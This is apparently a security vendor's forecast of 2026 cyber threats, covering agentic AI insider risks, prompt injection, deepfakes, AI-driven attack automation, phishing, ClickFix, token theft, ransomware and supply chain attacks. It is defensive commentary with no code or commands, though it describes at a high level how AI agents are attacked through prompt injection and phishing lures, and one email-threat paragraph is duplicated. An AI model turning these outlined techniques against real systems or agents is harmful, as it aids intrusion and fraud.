Agentic Insider Threats
Useful production AI implementations are still far from everywhere, but they are rapidly moving from simple chat assistants to full autonomy. These AI agents can reason, plan, and orchestrate complex, multi-step tasks with minimal human oversight. We believe that many organizations will sacrifice accuracy and — unfortunately — security for speed.
With each agent and tool potentially requiring its own digital identity, the number of such entities will explode, leaving organizations with the challenge of properly authenticating, monitoring, and restricting them. As these agents run in the background, acting independently across enterprise environments to access data, they generate a new attack surface. Attackers will happily abuse this to establish their own agentic insider, utilizing autonomous agents and unsecured AI MCP (Model Context Protocol) servers to exfiltrate data with just a few simple words.
This does not even account for Shadow AI, where well-meaning employees leak data by copy-pasting sensitive information — such as customer details — into unapproved Cloud AI apps and LLMs. To counter this, organizations will push for a Zero Trust AI environment in an attempt to tame AI's wild spread.
Prompt Injection
Prompt injection — whether direct or indirect — deserves its own focus. We fear this attack type will remain with us for a long time. The fundamental issue of distinguishing between code and data is notoriously difficult to solve, as acknowledged by OpenAI as well. Adding too many security checks limits a model's creativity and slows down the inference process. Furthermore, making detections work across agents by analyzing intent and expected outcomes is not foolproof either.
Compliance regulations in some regions increase this visibility gap, as organizations may not be permitted to log all messages on platforms like Slack or email, which is required to prove prompt injections occurred after an incident. Hence, for 2026, we predict prompt injections will be everywhere. Data poisoning attacks will occur as well, but not at the same scale or extent.
Deepfakes
CEO fraud involving cloned voices and fake video calls is becoming easier for attackers to conduct. Scammers can now use voice systems to fully automate scam calls. Despite this, we believe such attacks will not be the norm in 2026, simply because there are still enough victims who fall for simpler scams via basic written emails. Attackers will stick to tried-and-tested methods as long as they remain profitable, while slowly building up their new techniques. Nevertheless, AI automation will boost romance scams, Know Your Customer (KYC) bypasses, fake invoice scams, and anything else relying on visual verification, leading to an erosion of trust across many fields. Getting access to voice-cloning apps is unfortunately very simple, as Consumer Reports has found.
Attack Automation
AI-assisted attack automation frameworks will become the standard in 2026. These will be used to assist the attackers in the full attack kill chain, from the initial breach and vulnerability discovery to exploitation at scale. Think of it as a fully automated penetration test running 24/7. This will not necessarily innovate completely new techniques, but rather use existing tools efficiently with little human oversight. Therefore, these attacks can be detected and blocked with known mitigations — if you are fast enough to react. A report from Anthropic in November highlighted how attackers can automate such attacks. Although the report lacks crucial details, companies such as XBOW and Horizon3.ai have demonstrated that attack automation is very much feasible.
Defenders must automate to defend at machine speed. We need to do our homework by implementing known best practices throughout the organization, otherwise, technical debt — such as unpatched systems or insecure remote access — will be compromised in near real-time. This will drive a push for proactive exposure management rather than reactive measures. Agentic AI acts as an accelerator, affecting the quantity of attacks more than the quality.
It is less about the capabilities of future AI models and more about the framework and the "glue" that binds them with various tools — that is the secret sauce. Cybercriminals are moving away from popular frontier models towards open-weight AI models, which allows them to host the infrastructure themselves, removing guardrails and monitoring. This increases the blind spot for the research community further, as they no longer have access to prompt reports.
AI vs. AI
As we enter AI vs. AI scenarios where every minute counts, companies have started to implement automated SOCs and automated AI triage of incidents to keep up. Consequently, we will likely see attackers abuse automated mitigations and SOAR platforms to disrupt organizations by generating false signals or injecting fake events into the AI workflows.
AI Malware
Contrary to popular belief, AI-powered malware will not be the norm. The benefits for attackers using fully AI-powered malware are currently limited; these threats are unreliable, unpredictable in outcome, and quite noisy. Attackers prefer attack automation (as discussed above) with less reliance on heavy malware payloads, preferring instead to tunnel access to their attack framework. This allows them to dynamically adapt to the environment without the disadvantages of traditional malware. A November report from Google highlighted that, so far, they have only seen basic malware abusing their Gemini models, and they have not come across any novel capabilities.
While basic off-the-shelf malware will be generated by AI in large quantities, the malware itself will not contain AI capabilities. There will likely only be a handful of cases of genuine AI-powered malware in 2026.
Email Threats
Attackers have automated phishing and spam email campaigns from start to finish with the help of AI, including the interactions required for BEC (Business Email Compromise), romance scams, or fake recruiter scams. They are also using zero-code platforms to generate phishing websites on the fly. This allows them to scale even larger while using AI to personalize each email.
We have seen a further uptick in the malicious use of trusted infrastructure and SaaS applications, such as calendar invites or hijacked marketing platforms. This follows the classic Living-off-the-Land tactic, leveraging trusted sender domains to evade detection. ASCII QR codes, SVG smuggling, blob URLs, and similar techniques will persist until defenses catch up or attackers develop newer variations.
This follows the classic Living-off-the-Land tactic, making it harder to block, because of senders with trusted domains. ASCII QR codes, SVG Smuggling, blob URLs, and other techniques will continue to be used until protection reaches a better level or newer variations are discovered.
Identity Theft
Stolen identities, sourced from phishing attacks and infostealers, will be used en-masse for initial breaches. The trend is moving away from pure password stealing towards session and token theft to bypass MFA mitigations. AI is helping attackers analyze the enormous logs of stolen credentials quickly while they are still fresh. This challenge is compounded further by the increase of non-human identities, which often do not use MFA.
Targeting the Browser
Browsers are slowly becoming the "new OS" of the enterprise, as many SaaS applications are part of daily operations. Additionally, increased network encryption, like Encrypted Client Hello (ECH), will force more analysis back to the endpoint.
In 2025, we saw a revival of "ClickFix" and other variations of manual scripting attacks. Here, the user is socially engineered to copy and execute code — for example, under the disguise of a CAPTCHA alternative. Since the action is user-initiated, many security tools struggle to detect it, though EDRs are catching up.
Various vendors are pushing dedicated agentic AI browsers, while others are equipping existing browsers like Chrome with extensions that make them agentic. With the introduction of shopping agents, there will be a surge of attackers trying to abuse them to purchase fake products or push other scams. After all, how do you conduct awareness training for your AI email agent, teaching it not to click on phishing links or fall for FormJacking? Models from major vendors have been found susceptible to phishing lures in the past, incorrectly prioritizing phishing emails due to the perceived urgency, highlighting the severity of this issue.
DevOps and AppSec
The increased use of vibe coding or AI-assisted Integrated Development Environments (IDEs) leads to more code being written by AI. This is a double-edged sword: while some beginner mistakes are avoided, AI may forget to check for edge cases if not explicitly asked, introducing new vulnerabilities.
These IDEs are also a prime target for attacks aiming to hijack AI models and embed persistent backdoors into automation workflows, as demonstrated by researchers. AppSec teams are starting to add AI apps to their threat modeling plans as they realize these applications require additional attention. Furthermore, AI-powered vulnerability researchers (such as XBOW) are finding hundreds of vulnerabilities. While very useful, this leads to bug bounty programs getting swamped with new issues that need fixing by the vendors.
Hybrid Cloud
Multi-cloud and hybrid setups with on-premise installations are booming again due to data sovereignty concerns in Europe. This shift often leads to exposed APIs and misconfigured environments. Attackers are increasingly interested in attacking cloud environments at all layers to access data. Attackers often strike from within the same IT stack, performing cloud-to-cloud attacks.
What's Here to Stay
Ransomware
Exfiltration- and extortion-based ransomware will persist, bolstered by the previously mentioned attack vectors. More groups will collaborate, and add AI for negotiation and other tasks, leading to faster and more selectively executed attacks.
Supply Chain Attacks
Attacks against developer packages and pipelines will remain at an all-time high. Once successful, such attacks provide cybercriminals access to a vast number of targets at once.
Quantum Proofing
The threat of "harvest now, decrypt later" is widely understood. Organizations are steadily moving their infrastructure to post-quantum algorithms with the help of providers such as Cloudflare.
Conclusion
The era of deferring security maintenance is over. As agentic AI accelerates attacks to machine speed, long-standing technical debt will transform from a manageable risk into an immediate liability. To survive 2026, organizations must pivot from reactive defense to proactive resilience — fixing the basics today to withstand the automation of tomorrow.
